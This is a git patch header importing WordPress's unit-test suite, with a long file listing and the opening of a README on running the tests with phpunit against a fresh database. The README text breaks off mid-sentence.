From 1801ed459c07654351ea0ea6d0e22cd5eb1df411 Mon Sep 17 00:00:00 2001 From: Andrew Nacin Date: Wed, 7 Aug 2013 06:38:38 +0000 Subject: [PATCH] Initial import of unit-tests repository into develop.svn.wordpress.org. Imported from https://unit-tests.svn.wordpress.org/trunk@1337 see #24976. git-svn-id: https://develop.svn.wordpress.org/trunk@25002 602fd350-edb4-49c9-b593-d223f7449a82 --- tests/README.txt | 23 + tests/build.xml | 15 + tests/build/logs/junit.xml | 2057 +++++++++ ....trac-ticket-cache.core.trac.wordpress.org | 3795 +++++++++++++++++ ...ticket-cache.unit-tests.trac.wordpress.org | 29 + .../WPHTTP-testcase-redirection-script.php | 112 + tests/data/export/crazy-cdata-escaped.xml | 46 + tests/data/export/crazy-cdata.xml | 46 + tests/data/export/invalid-version-tag.xml | 91 + tests/data/export/malformed.xml | 91 + tests/data/export/missing-version-tag.xml | 90 + tests/data/export/small-export.xml | 447 ++ .../test-serialized-postmeta-no-cdata.xml | 69 + .../test-serialized-postmeta-with-cdata.xml | 77 + .../data/export/test-utw-post-meta-import.xml | 69 + tests/data/export/valid-wxr-1.0.xml | 282 ++ tests/data/export/valid-wxr-1.1.xml | 112 + tests/data/formatting/big5.txt | 51 + .../cr-line-endings-file-header.php | 5 + tests/data/formatting/entities.txt | 255 ++ .../formatting/remove_accents.01.input.txt | 1 + tests/data/formatting/sizzle.js | 1445 +++++++ tests/data/formatting/utf-8/README | 15 + tests/data/formatting/utf-8/entitize.py | 24 + tests/data/formatting/utf-8/entitized.txt | 5 + tests/data/formatting/utf-8/u-urlencode.py | 24 + tests/data/formatting/utf-8/u-urlencoded.txt | 5 + tests/data/formatting/utf-8/urlencode.py | 33 + tests/data/formatting/utf-8/urlencoded.txt | 5 + tests/data/formatting/utf-8/utf-8.txt | 5 + tests/data/formatting/windows1252.py | 27 + tests/data/formatting/xssAttacks.xml | 976 +++++ tests/data/images/2004-07-22-DSC_0007.jpg | Bin 0 -> 87348 bytes tests/data/images/2004-07-22-DSC_0008.jpg | Bin 0 -> 112149 bytes tests/data/images/2007-06-17DSC_4173.JPG | Bin 0 -> 95186 bytes tests/data/images/a2-small-100x75.jpg | Bin 0 -> 3779 bytes tests/data/images/a2-small.jpg | Bin 0 -> 48641 bytes tests/data/images/canola.jpg | Bin 0 -> 203156 bytes tests/data/images/gradient-square.jpg | Bin 0 -> 1053 bytes tests/data/images/test-image-cmyk.jpg | Bin 0 -> 11942 bytes tests/data/images/test-image-grayscale.jpg | Bin 0 -> 10951 bytes tests/data/images/test-image-iptc.jpg | Bin 0 -> 2152 bytes tests/data/images/test-image-lzw.tiff | Bin 0 -> 10404 bytes tests/data/images/test-image-mime-jpg.png | Bin 0 -> 2028 bytes tests/data/images/test-image-zip.tiff | Bin 0 -> 1922 bytes tests/data/images/test-image.bmp | Bin 0 -> 10054 bytes tests/data/images/test-image.gif | Bin 0 -> 524 bytes tests/data/images/test-image.jp2 | Bin 0 -> 705 bytes tests/data/images/test-image.jpg | Bin 0 -> 2028 bytes tests/data/images/test-image.pct | Bin 0 -> 12046 bytes tests/data/images/test-image.png | Bin 0 -> 1011 bytes tests/data/images/test-image.psd | Bin 0 -> 41154 bytes tests/data/images/test-image.sgi | Bin 0 -> 4026 bytes tests/data/images/test-image.tga | Bin 0 -> 1516 bytes tests/data/images/test-image.tiff | Bin 0 -> 10404 bytes tests/data/images/transparent.png | Bin 0 -> 47037 bytes tests/data/images/waffles.jpg | Bin 0 -> 68655 bytes tests/data/plugins/hello.php | 14 + tests/data/pomo/bad_nplurals.mo | Bin 0 -> 525 bytes tests/data/pomo/bad_nplurals.po | 18 + tests/data/pomo/context.mo | Bin 0 -> 197 bytes tests/data/pomo/de_DE-2.8.mo | Bin 0 -> 302972 bytes tests/data/pomo/empty.po | 0 tests/data/pomo/mo.pot | 25 + tests/data/pomo/overload.mo | Bin 0 -> 367499 bytes tests/data/pomo/plural.mo | Bin 0 -> 268 bytes tests/data/pomo/simple.mo | Bin 0 -> 202 bytes tests/data/pomo/simple.po | 54 + tests/data/pomo/windows-line-endings.po | 7 + tests/data/themedir1/default/functions.php | 7 + tests/data/themedir1/default/index.php | 7 + tests/data/themedir1/default/style.css | 17 + tests/data/themedir1/page-templates/index.php | 3 + tests/data/themedir1/page-templates/style.css | 11 + .../subdir/template-sub-dir.php | 5 + .../page-templates/template-header.php | 1 + .../page-templates/template-top-level.php | 5 + tests/data/themedir1/sandbox/functions.php | 7 + tests/data/themedir1/sandbox/index.php | 7 + tests/data/themedir1/sandbox/style.css | 11 + tests/data/themedir1/stylesheetonly/style.css | 14 + .../subdir/theme with spaces/index.php | 1 + .../subdir/theme with spaces/style.css | 11 + .../themedir1/subdir/theme2/functions.php | 3 + tests/data/themedir1/subdir/theme2/index.php | 3 + tests/data/themedir1/subdir/theme2/style.css | 11 + .../data/themedir1/theme1-dupe/functions.php | 7 + tests/data/themedir1/theme1-dupe/index.php | 7 + tests/data/themedir1/theme1-dupe/style.css | 17 + tests/data/themedir1/theme1/functions.php | 7 + tests/data/themedir1/theme1/index.php | 7 + tests/data/themedir1/theme1/style.css | 17 + tests/includes/bootstrap.php | 136 + tests/includes/exceptions.php | 33 + tests/includes/factory.php | 344 ++ tests/includes/functions.php | 44 + tests/includes/install.php | 67 + tests/includes/mock-image-editor.php | 43 + tests/includes/mock-mailer.php | 26 + tests/includes/testcase-ajax.php | 182 + tests/includes/testcase-xmlrpc.php | 30 + tests/includes/testcase.php | 227 + tests/includes/trac.php | 54 + tests/includes/utils.php | 365 ++ tests/includes/wp-profiler.php | 216 + tests/multisite.xml | 28 + tests/phpunit.xml.dist | 28 + tests/tests/actions.php | 253 ++ tests/tests/actions/callbacks.php | 22 + tests/tests/actions/closures.php | 38 + tests/tests/admin/includesFile.php | 38 + tests/tests/admin/includesMisc.php | 25 + tests/tests/admin/includesPlugin.php | 59 + tests/tests/admin/includesPost.php | 117 + tests/tests/admin/includesScreen.php | 207 + tests/tests/admin/includesTemplate.php | 48 + tests/tests/admin/includesTheme.php | 54 + tests/tests/adminbar.php | 64 + tests/tests/ajax/Autosave.php | 114 + tests/tests/ajax/Compression.php | 199 + tests/tests/ajax/DeleteComment.php | 355 ++ tests/tests/ajax/DimComment.php | 238 ++ tests/tests/ajax/EditComment.php | 148 + tests/tests/ajax/GetComments.php | 159 + tests/tests/ajax/MediaEdit.php | 102 + tests/tests/ajax/ReplytoComment.php | 226 + tests/tests/ajax/Response.php | 102 + tests/tests/ajax/TagSearch.php | 152 + tests/tests/attachment/slashes.php | 63 + tests/tests/auth.php | 66 + tests/tests/basic.php | 91 + tests/tests/cache.php | 308 ++ tests/tests/canonical.php | 274 ++ tests/tests/canonical/customRules.php | 35 + tests/tests/canonical/noRewrite.php | 45 + tests/tests/canonical/pageOnFront.php | 38 + tests/tests/canonical/permalinkFormats.php | 80 + tests/tests/comment.php | 17 + tests/tests/comment/query.php | 156 + tests/tests/comment/slashes.php | 162 + tests/tests/compat.php | 36 + tests/tests/cron.php | 310 ++ tests/tests/db.php | 128 + tests/tests/dependencies.php | 176 + tests/tests/dependencies/jquery.php | 62 + tests/tests/dependencies/scripts.php | 111 + tests/tests/dependencies/styles.php | 87 + tests/tests/export/class-wp-export-query.php | 248 ++ tests/tests/export/functions.export.php | 35 + tests/tests/export/writers.php | 25 + tests/tests/feed/rss2.php | 147 + tests/tests/file.php | 155 + tests/tests/filters.php | 266 ++ tests/tests/formatting/Autop.php | 101 + tests/tests/formatting/CleanPre.php | 38 + tests/tests/formatting/ConvertChars.php | 40 + tests/tests/formatting/EscAttr.php | 32 + tests/tests/formatting/EscHtml.php | 40 + tests/tests/formatting/EscTextarea.php | 36 + tests/tests/formatting/EscUrl.php | 83 + tests/tests/formatting/HtmlExcerpt.php | 19 + tests/tests/formatting/IsEmail.php | 31 + tests/tests/formatting/JSEscape.php | 46 + tests/tests/formatting/LikeEscape.php | 29 + tests/tests/formatting/MakeClickable.php | 347 ++ tests/tests/formatting/MapDeep.php | 55 + tests/tests/formatting/RemoveAccents.php | 97 + tests/tests/formatting/SanitizeFileName.php | 34 + tests/tests/formatting/SanitizeMimeType.php | 38 + tests/tests/formatting/SanitizeOrderby.php | 38 + tests/tests/formatting/SanitizePost.php | 25 + tests/tests/formatting/SanitizeTextField.php | 47 + tests/tests/formatting/SanitizeTitle.php | 18 + .../formatting/SanitizeTitleWithDashes.php | 107 + .../formatting/SanitizeTrackbackUrls.php | 27 + tests/tests/formatting/SanitizeUser.php | 27 + tests/tests/formatting/SeemsUtf8.php | 46 + tests/tests/formatting/Slashit.php | 31 + tests/tests/formatting/Smilies.php | 84 + tests/tests/formatting/StripSlashesDeep.php | 47 + .../tests/formatting/UrlEncodedToEntities.php | 24 + tests/tests/formatting/Utf8UriEncode.php | 36 + tests/tests/formatting/WPSpecialchars.php | 42 + tests/tests/formatting/WPTexturize.php | 197 + tests/tests/formatting/WPTrimWords.php | 45 + tests/tests/formatting/WpHtmlEditPre.php | 36 + tests/tests/formatting/WpRichEditPre.php | 36 + tests/tests/formatting/Zeroise.php | 14 + tests/tests/formatting/balanceTags.php | 234 + tests/tests/formatting/date.php | 50 + tests/tests/formatting/ent2ncr.php | 36 + tests/tests/formatting/isoDescrambler.php | 14 + tests/tests/formatting/redirect.php | 17 + tests/tests/formatting/wp_basename.php | 34 + tests/tests/functions.php | 339 ++ tests/tests/functions/deprecated.php | 177 + tests/tests/functions/listFilter.php | 113 + tests/tests/general/archives.php | 111 + tests/tests/http/base.php | 262 ++ tests/tests/http/curl.php | 11 + tests/tests/http/fsockopen.php | 20 + tests/tests/http/functions.php | 78 + tests/tests/http/http.php | 62 + tests/tests/http/streams.php | 11 + tests/tests/image/base.php | 50 + tests/tests/image/dimensions.php | 131 + tests/tests/image/editor.php | 149 + tests/tests/image/editor_gd.php | 158 + tests/tests/image/editor_imagick.php | 165 + tests/tests/image/functions.php | 321 ++ tests/tests/image/intermediate_size.php | 46 + tests/tests/image/meta.php | 141 + tests/tests/image/resize.php | 169 + tests/tests/image/resize_gd.php | 15 + tests/tests/image/resize_imagick.php | 15 + tests/tests/image/size.php | 198 + tests/tests/import/base.php | 53 + tests/tests/import/import.php | 226 + tests/tests/import/parser.php | 192 + tests/tests/import/postmeta.php | 94 + tests/tests/includes/factory.php | 31 + tests/tests/iterators.php | 45 + tests/tests/kses.php | 362 ++ tests/tests/l10n.php | 29 + tests/tests/link.php | 30 + tests/tests/mail.php | 226 + tests/tests/media.php | 343 ++ tests/tests/meta.php | 153 + tests/tests/meta/query.php | 108 + tests/tests/meta/slashes.php | 275 ++ tests/tests/ms.php | 1008 +++++ tests/tests/option/blogOption.php | 137 + tests/tests/option/option.php | 102 + tests/tests/option/siteOption.php | 93 + tests/tests/option/siteTransient.php | 36 + tests/tests/option/slashes.php | 57 + tests/tests/option/transient.php | 36 + tests/tests/pomo/mo.php | 143 + tests/tests/pomo/noopTranslations.php | 41 + tests/tests/pomo/po.php | 218 + tests/tests/pomo/translationEntry.php | 37 + tests/tests/pomo/translations.php | 75 + tests/tests/post.php | 801 ++++ tests/tests/post/attachments.php | 234 + tests/tests/post/filtering.php | 212 + tests/tests/post/formats.php | 159 + tests/tests/post/gallery.php | 156 + tests/tests/post/getPages.php | 120 + tests/tests/post/meta.php | 246 ++ tests/tests/post/objects.php | 221 + tests/tests/post/output.php | 174 + tests/tests/post/query.php | 547 +++ tests/tests/post/revisions.php | 341 ++ tests/tests/post/slashes.php | 132 + tests/tests/post/types.php | 84 + tests/tests/query.php | 60 + tests/tests/query/conditionals.php | 632 +++ tests/tests/query/results.php | 372 ++ tests/tests/query/verboseRewriteRules.php | 18 + tests/tests/shortcode.php | 376 ++ tests/tests/taxonomy.php | 106 + tests/tests/term.php | 460 ++ tests/tests/term/getTerms.php | 90 + tests/tests/term/slashes.php | 129 + tests/tests/theme.php | 264 ++ tests/tests/theme/WPTheme.php | 113 + tests/tests/theme/support.php | 101 + tests/tests/theme/themeDir.php | 203 + tests/tests/theme/themeDirLarge.php | 70 + tests/tests/upload.php | 97 + tests/tests/url.php | 342 ++ tests/tests/user.php | 639 +++ tests/tests/user/author.php | 78 + tests/tests/user/capabilities.php | 670 +++ tests/tests/user/mapMetaCap.php | 235 + tests/tests/user/query.php | 79 + tests/tests/user/slashes.php | 210 + tests/tests/widgets.php | 78 + tests/tests/xmlrpc/basic.php | 28 + tests/tests/xmlrpc/mt/getRecentPostTitles.php | 51 + tests/tests/xmlrpc/mw/editPost.php | 199 + tests/tests/xmlrpc/mw/getPost.php | 142 + tests/tests/xmlrpc/mw/getRecentPosts.php | 155 + tests/tests/xmlrpc/mw/newPost.php | 162 + tests/tests/xmlrpc/wp/deletePost.php | 42 + tests/tests/xmlrpc/wp/deleteTerm.php | 74 + tests/tests/xmlrpc/wp/editPost.php | 369 ++ tests/tests/xmlrpc/wp/editProfile.php | 69 + tests/tests/xmlrpc/wp/editTerm.php | 136 + tests/tests/xmlrpc/wp/getComment.php | 105 + tests/tests/xmlrpc/wp/getComments.php | 74 + tests/tests/xmlrpc/wp/getMediaItem.php | 78 + tests/tests/xmlrpc/wp/getOptions.php | 211 + tests/tests/xmlrpc/wp/getPage.php | 102 + tests/tests/xmlrpc/wp/getPageList.php | 57 + tests/tests/xmlrpc/wp/getPages.php | 86 + tests/tests/xmlrpc/wp/getPost.php | 145 + tests/tests/xmlrpc/wp/getPostType.php | 132 + tests/tests/xmlrpc/wp/getPostTypes.php | 43 + tests/tests/xmlrpc/wp/getPosts.php | 153 + tests/tests/xmlrpc/wp/getProfile.php | 45 + tests/tests/xmlrpc/wp/getRevisions.php | 64 + tests/tests/xmlrpc/wp/getTaxonomies.php | 20 + tests/tests/xmlrpc/wp/getTaxonomy.php | 63 + tests/tests/xmlrpc/wp/getTerm.php | 98 + tests/tests/xmlrpc/wp/getTerms.php | 149 + tests/tests/xmlrpc/wp/getUser.php | 144 + tests/tests/xmlrpc/wp/getUsers.php | 115 + tests/tests/xmlrpc/wp/newPost.php | 308 ++ tests/tests/xmlrpc/wp/newTerm.php | 110 + tests/tests/xmlrpc/wp/restoreRevision.php | 52 + tests/tests/xmlrpc/wp/uploadFile.php | 79 + tests/wp-mail-real-test.php | 85 + tests/wp-tests-config-sample.php | 39 + tests/wp-tests-config.php | 39 + 315 files changed, 40437 insertions(+) create mode 100644 tests/README.txt create mode 100644 tests/build.xml create mode 100644 tests/build/logs/junit.xml create mode 100644 tests/data/.trac-ticket-cache.core.trac.wordpress.org create mode 100644 tests/data/.trac-ticket-cache.unit-tests.trac.wordpress.org create mode 100644 tests/data/WPHTTP-testcase-redirection-script.php create mode 100644 tests/data/export/crazy-cdata-escaped.xml create mode 100644 tests/data/export/crazy-cdata.xml create mode 100644 tests/data/export/invalid-version-tag.xml create mode 100644 tests/data/export/malformed.xml create mode 100644 tests/data/export/missing-version-tag.xml create mode 100644 tests/data/export/small-export.xml create mode 100644 tests/data/export/test-serialized-postmeta-no-cdata.xml create mode 100644 tests/data/export/test-serialized-postmeta-with-cdata.xml create mode 100644 tests/data/export/test-utw-post-meta-import.xml create mode 100644 tests/data/export/valid-wxr-1.0.xml create mode 100644 tests/data/export/valid-wxr-1.1.xml create mode 100644 tests/data/formatting/big5.txt create mode 100644 tests/data/formatting/cr-line-endings-file-header.php create mode 100644 tests/data/formatting/entities.txt create mode 100644 tests/data/formatting/remove_accents.01.input.txt create mode 100644 tests/data/formatting/sizzle.js create mode 100644 tests/data/formatting/utf-8/README create mode 100644 tests/data/formatting/utf-8/entitize.py create mode 100644 tests/data/formatting/utf-8/entitized.txt create mode 100644 tests/data/formatting/utf-8/u-urlencode.py create mode 100644 tests/data/formatting/utf-8/u-urlencoded.txt create mode 100644 tests/data/formatting/utf-8/urlencode.py create mode 100644 tests/data/formatting/utf-8/urlencoded.txt create mode 100644 tests/data/formatting/utf-8/utf-8.txt create mode 100644 tests/data/formatting/windows1252.py create mode 100644 tests/data/formatting/xssAttacks.xml create mode 100644 tests/data/images/2004-07-22-DSC_0007.jpg create mode 100644 tests/data/images/2004-07-22-DSC_0008.jpg create mode 100644 tests/data/images/2007-06-17DSC_4173.JPG create mode 100644 tests/data/images/a2-small-100x75.jpg create mode 100644 tests/data/images/a2-small.jpg create mode 100644 tests/data/images/canola.jpg create mode 100644 tests/data/images/gradient-square.jpg create mode 100755 tests/data/images/test-image-cmyk.jpg create mode 100755 tests/data/images/test-image-grayscale.jpg create mode 100644 tests/data/images/test-image-iptc.jpg create mode 100644 tests/data/images/test-image-lzw.tiff create mode 100644 tests/data/images/test-image-mime-jpg.png create mode 100644 tests/data/images/test-image-zip.tiff create mode 100644 tests/data/images/test-image.bmp create mode 100644 tests/data/images/test-image.gif create mode 100644 tests/data/images/test-image.jp2 create mode 100644 tests/data/images/test-image.jpg create mode 100644 tests/data/images/test-image.pct create mode 100644 tests/data/images/test-image.png create mode 100644 tests/data/images/test-image.psd create mode 100644 tests/data/images/test-image.sgi create mode 100644 tests/data/images/test-image.tga create mode 100644 tests/data/images/test-image.tiff create mode 100644 tests/data/images/transparent.png create mode 100644 tests/data/images/waffles.jpg create mode 100644 tests/data/plugins/hello.php create mode 100644 tests/data/pomo/bad_nplurals.mo create mode 100644 tests/data/pomo/bad_nplurals.po create mode 100644 tests/data/pomo/context.mo create mode 100644 tests/data/pomo/de_DE-2.8.mo create mode 100644 tests/data/pomo/empty.po create mode 100644 tests/data/pomo/mo.pot create mode 100644 tests/data/pomo/overload.mo create mode 100644 tests/data/pomo/plural.mo create mode 100644 tests/data/pomo/simple.mo create mode 100644 tests/data/pomo/simple.po create mode 100644 tests/data/pomo/windows-line-endings.po create mode 100644 tests/data/themedir1/default/functions.php create mode 100644 tests/data/themedir1/default/index.php create mode 100644 tests/data/themedir1/default/style.css create mode 100644 tests/data/themedir1/page-templates/index.php create mode 100644 tests/data/themedir1/page-templates/style.css create mode 100644 tests/data/themedir1/page-templates/subdir/template-sub-dir.php create mode 100644 tests/data/themedir1/page-templates/template-header.php create mode 100644 tests/data/themedir1/page-templates/template-top-level.php create mode 100644 tests/data/themedir1/sandbox/functions.php create mode 100644 tests/data/themedir1/sandbox/index.php create mode 100644 tests/data/themedir1/sandbox/style.css create mode 100644 tests/data/themedir1/stylesheetonly/style.css create mode 100644 tests/data/themedir1/subdir/theme with spaces/index.php create mode 100644 tests/data/themedir1/subdir/theme with spaces/style.css create mode 100644 tests/data/themedir1/subdir/theme2/functions.php create mode 100644 tests/data/themedir1/subdir/theme2/index.php create mode 100644 tests/data/themedir1/subdir/theme2/style.css create mode 100644 tests/data/themedir1/theme1-dupe/functions.php create mode 100644 tests/data/themedir1/theme1-dupe/index.php create mode 100644 tests/data/themedir1/theme1-dupe/style.css create mode 100644 tests/data/themedir1/theme1/functions.php create mode 100644 tests/data/themedir1/theme1/index.php create mode 100644 tests/data/themedir1/theme1/style.css create mode 100644 tests/includes/bootstrap.php create mode 100644 tests/includes/exceptions.php create mode 100644 tests/includes/factory.php create mode 100644 tests/includes/functions.php create mode 100644 tests/includes/install.php create mode 100644 tests/includes/mock-image-editor.php create mode 100644 tests/includes/mock-mailer.php create mode 100644 tests/includes/testcase-ajax.php create mode 100644 tests/includes/testcase-xmlrpc.php create mode 100644 tests/includes/testcase.php create mode 100644 tests/includes/trac.php create mode 100644 tests/includes/utils.php create mode 100644 tests/includes/wp-profiler.php create mode 100644 tests/multisite.xml create mode 100644 tests/phpunit.xml.dist create mode 100644 tests/tests/actions.php create mode 100644 tests/tests/actions/callbacks.php create mode 100644 tests/tests/actions/closures.php create mode 100644 tests/tests/admin/includesFile.php create mode 100644 tests/tests/admin/includesMisc.php create mode 100644 tests/tests/admin/includesPlugin.php create mode 100644 tests/tests/admin/includesPost.php create mode 100644 tests/tests/admin/includesScreen.php create mode 100644 tests/tests/admin/includesTemplate.php create mode 100644 tests/tests/admin/includesTheme.php create mode 100644 tests/tests/adminbar.php create mode 100644 tests/tests/ajax/Autosave.php create mode 100644 tests/tests/ajax/Compression.php create mode 100644 tests/tests/ajax/DeleteComment.php create mode 100644 tests/tests/ajax/DimComment.php create mode 100644 tests/tests/ajax/EditComment.php create mode 100644 tests/tests/ajax/GetComments.php create mode 100644 tests/tests/ajax/MediaEdit.php create mode 100644 tests/tests/ajax/ReplytoComment.php create mode 100644 tests/tests/ajax/Response.php create mode 100644 tests/tests/ajax/TagSearch.php create mode 100644 tests/tests/attachment/slashes.php create mode 100644 tests/tests/auth.php create mode 100644 tests/tests/basic.php create mode 100644 tests/tests/cache.php create mode 100644 tests/tests/canonical.php create mode 100644 tests/tests/canonical/customRules.php create mode 100644 tests/tests/canonical/noRewrite.php create mode 100644 tests/tests/canonical/pageOnFront.php create mode 100644 tests/tests/canonical/permalinkFormats.php create mode 100644 tests/tests/comment.php create mode 100644 tests/tests/comment/query.php create mode 100644 tests/tests/comment/slashes.php create mode 100644 tests/tests/compat.php create mode 100644 tests/tests/cron.php create mode 100644 tests/tests/db.php create mode 100644 tests/tests/dependencies.php create mode 100644 tests/tests/dependencies/jquery.php create mode 100644 tests/tests/dependencies/scripts.php create mode 100644 tests/tests/dependencies/styles.php create mode 100644 tests/tests/export/class-wp-export-query.php create mode 100644 tests/tests/export/functions.export.php create mode 100644 tests/tests/export/writers.php create mode 100644 tests/tests/feed/rss2.php create mode 100644 tests/tests/file.php create mode 100644 tests/tests/filters.php create mode 100644 tests/tests/formatting/Autop.php create mode 100644 tests/tests/formatting/CleanPre.php create mode 100644 tests/tests/formatting/ConvertChars.php create mode 100644 tests/tests/formatting/EscAttr.php create mode 100644 tests/tests/formatting/EscHtml.php create mode 100644 tests/tests/formatting/EscTextarea.php create mode 100644 tests/tests/formatting/EscUrl.php create mode 100644 tests/tests/formatting/HtmlExcerpt.php create mode 100644 tests/tests/formatting/IsEmail.php create mode 100644 tests/tests/formatting/JSEscape.php create mode 100644 tests/tests/formatting/LikeEscape.php create mode 100644 tests/tests/formatting/MakeClickable.php create mode 100644 tests/tests/formatting/MapDeep.php create mode 100644 tests/tests/formatting/RemoveAccents.php create mode 100644 tests/tests/formatting/SanitizeFileName.php create mode 100644 tests/tests/formatting/SanitizeMimeType.php create mode 100644 tests/tests/formatting/SanitizeOrderby.php create mode 100644 tests/tests/formatting/SanitizePost.php create mode 100644 tests/tests/formatting/SanitizeTextField.php create mode 100644 tests/tests/formatting/SanitizeTitle.php create mode 100644 tests/tests/formatting/SanitizeTitleWithDashes.php create mode 100644 tests/tests/formatting/SanitizeTrackbackUrls.php create mode 100644 tests/tests/formatting/SanitizeUser.php create mode 100644 tests/tests/formatting/SeemsUtf8.php create mode 100644 tests/tests/formatting/Slashit.php create mode 100644 tests/tests/formatting/Smilies.php create mode 100644 tests/tests/formatting/StripSlashesDeep.php create mode 100644 tests/tests/formatting/UrlEncodedToEntities.php create mode 100644 tests/tests/formatting/Utf8UriEncode.php create mode 100644 tests/tests/formatting/WPSpecialchars.php create mode 100644 tests/tests/formatting/WPTexturize.php create mode 100644 tests/tests/formatting/WPTrimWords.php create mode 100644 tests/tests/formatting/WpHtmlEditPre.php create mode 100644 tests/tests/formatting/WpRichEditPre.php create mode 100644 tests/tests/formatting/Zeroise.php create mode 100644 tests/tests/formatting/balanceTags.php create mode 100644 tests/tests/formatting/date.php create mode 100644 tests/tests/formatting/ent2ncr.php create mode 100644 tests/tests/formatting/isoDescrambler.php create mode 100644 tests/tests/formatting/redirect.php create mode 100644 tests/tests/formatting/wp_basename.php create mode 100644 tests/tests/functions.php create mode 100644 tests/tests/functions/deprecated.php create mode 100644 tests/tests/functions/listFilter.php create mode 100644 tests/tests/general/archives.php create mode 100644 tests/tests/http/base.php create mode 100644 tests/tests/http/curl.php create mode 100644 tests/tests/http/fsockopen.php create mode 100644 tests/tests/http/functions.php create mode 100644 tests/tests/http/http.php create mode 100644 tests/tests/http/streams.php create mode 100644 tests/tests/image/base.php create mode 100644 tests/tests/image/dimensions.php create mode 100644 tests/tests/image/editor.php create mode 100644 tests/tests/image/editor_gd.php create mode 100644 tests/tests/image/editor_imagick.php create mode 100644 tests/tests/image/functions.php create mode 100644 tests/tests/image/intermediate_size.php create mode 100644 tests/tests/image/meta.php create mode 100644 tests/tests/image/resize.php create mode 100644 tests/tests/image/resize_gd.php create mode 100644 tests/tests/image/resize_imagick.php create mode 100644 tests/tests/image/size.php create mode 100644 tests/tests/import/base.php create mode 100644 tests/tests/import/import.php create mode 100644 tests/tests/import/parser.php create mode 100644 tests/tests/import/postmeta.php create mode 100644 tests/tests/includes/factory.php create mode 100644 tests/tests/iterators.php create mode 100644 tests/tests/kses.php create mode 100644 tests/tests/l10n.php create mode 100644 tests/tests/link.php create mode 100644 tests/tests/mail.php create mode 100644 tests/tests/media.php create mode 100644 tests/tests/meta.php create mode 100644 tests/tests/meta/query.php create mode 100644 tests/tests/meta/slashes.php create mode 100644 tests/tests/ms.php create mode 100644 tests/tests/option/blogOption.php create mode 100644 tests/tests/option/option.php create mode 100644 tests/tests/option/siteOption.php create mode 100644 tests/tests/option/siteTransient.php create mode 100644 tests/tests/option/slashes.php create mode 100644 tests/tests/option/transient.php create mode 100644 tests/tests/pomo/mo.php create mode 100644 tests/tests/pomo/noopTranslations.php create mode 100644 tests/tests/pomo/po.php create mode 100644 tests/tests/pomo/translationEntry.php create mode 100644 tests/tests/pomo/translations.php create mode 100644 tests/tests/post.php create mode 100644 tests/tests/post/attachments.php create mode 100644 tests/tests/post/filtering.php create mode 100644 tests/tests/post/formats.php create mode 100644 tests/tests/post/gallery.php create mode 100644 tests/tests/post/getPages.php create mode 100644 tests/tests/post/meta.php create mode 100644 tests/tests/post/objects.php create mode 100644 tests/tests/post/output.php create mode 100644 tests/tests/post/query.php create mode 100644 tests/tests/post/revisions.php create mode 100644 tests/tests/post/slashes.php create mode 100644 tests/tests/post/types.php create mode 100644 tests/tests/query.php create mode 100644 tests/tests/query/conditionals.php create mode 100644 tests/tests/query/results.php create mode 100644 tests/tests/query/verboseRewriteRules.php create mode 100644 tests/tests/shortcode.php create mode 100644 tests/tests/taxonomy.php create mode 100644 tests/tests/term.php create mode 100644 tests/tests/term/getTerms.php create mode 100644 tests/tests/term/slashes.php create mode 100644 tests/tests/theme.php create mode 100644 tests/tests/theme/WPTheme.php create mode 100644 tests/tests/theme/support.php create mode 100644 tests/tests/theme/themeDir.php create mode 100644 tests/tests/theme/themeDirLarge.php create mode 100644 tests/tests/upload.php create mode 100644 tests/tests/url.php create mode 100644 tests/tests/user.php create mode 100644 tests/tests/user/author.php create mode 100644 tests/tests/user/capabilities.php create mode 100644 tests/tests/user/mapMetaCap.php create mode 100644 tests/tests/user/query.php create mode 100644 tests/tests/user/slashes.php create mode 100644 tests/tests/widgets.php create mode 100644 tests/tests/xmlrpc/basic.php create mode 100644 tests/tests/xmlrpc/mt/getRecentPostTitles.php create mode 100644 tests/tests/xmlrpc/mw/editPost.php create mode 100644 tests/tests/xmlrpc/mw/getPost.php create mode 100644 tests/tests/xmlrpc/mw/getRecentPosts.php create mode 100644 tests/tests/xmlrpc/mw/newPost.php create mode 100644 tests/tests/xmlrpc/wp/deletePost.php create mode 100644 tests/tests/xmlrpc/wp/deleteTerm.php create mode 100644 tests/tests/xmlrpc/wp/editPost.php create mode 100644 tests/tests/xmlrpc/wp/editProfile.php create mode 100644 tests/tests/xmlrpc/wp/editTerm.php create mode 100644 tests/tests/xmlrpc/wp/getComment.php create mode 100644 tests/tests/xmlrpc/wp/getComments.php create mode 100644 tests/tests/xmlrpc/wp/getMediaItem.php create mode 100644 tests/tests/xmlrpc/wp/getOptions.php create mode 100644 tests/tests/xmlrpc/wp/getPage.php create mode 100644 tests/tests/xmlrpc/wp/getPageList.php create mode 100644 tests/tests/xmlrpc/wp/getPages.php create mode 100644 tests/tests/xmlrpc/wp/getPost.php create mode 100644 tests/tests/xmlrpc/wp/getPostType.php create mode 100644 tests/tests/xmlrpc/wp/getPostTypes.php create mode 100644 tests/tests/xmlrpc/wp/getPosts.php create mode 100644 tests/tests/xmlrpc/wp/getProfile.php create mode 100644 tests/tests/xmlrpc/wp/getRevisions.php create mode 100644 tests/tests/xmlrpc/wp/getTaxonomies.php create mode 100644 tests/tests/xmlrpc/wp/getTaxonomy.php create mode 100644 tests/tests/xmlrpc/wp/getTerm.php create mode 100644 tests/tests/xmlrpc/wp/getTerms.php create mode 100644 tests/tests/xmlrpc/wp/getUser.php create mode 100644 tests/tests/xmlrpc/wp/getUsers.php create mode 100644 tests/tests/xmlrpc/wp/newPost.php create mode 100644 tests/tests/xmlrpc/wp/newTerm.php create mode 100644 tests/tests/xmlrpc/wp/restoreRevision.php create mode 100644 tests/tests/xmlrpc/wp/uploadFile.php create mode 100644 tests/wp-mail-real-test.php create mode 100644 tests/wp-tests-config-sample.php create mode 100644 tests/wp-tests-config.php diff --git a/tests/README.txt b/tests/README.txt new file mode 100644 index 0000000000..3c7156d4be --- /dev/null +++ b/tests/README.txt @@ -0,0 +1,23 @@ +The short version: + +1. Create a clean MySQL database and user. DO NOT USE AN EXISTING DATABASE or you will lose data, guaranteed. + +2. Copy wp-tests-config-sample.php to wp-tests-config.php, edit it and include your database name/user/password. + +3. $ svn up + +4. Run the tests from the "trunk" directory: + To execute a particular test: + $ phpunit tests/test_case.php + To execute all tests: + $ phpunit + +Notes: + +Test cases live in the 'tests' subdirectory. All files in that directory will be included by default. Extend the WP_UnitTestCase class to ensure your test is run. + +phpunit will initialize and install a (more or less) complete running copy of WordPress each time it is run. This makes it possible to run functional interface and module tests against a fully working database and codebase, as opposed to pure unit tests with mock objects and stubs. Pure unit tests may be used also, of course. + +Changes to the test database will be rolled back as tests are finished, to ensure a clean start next time the tests are run. + +phpunit is intended to run at 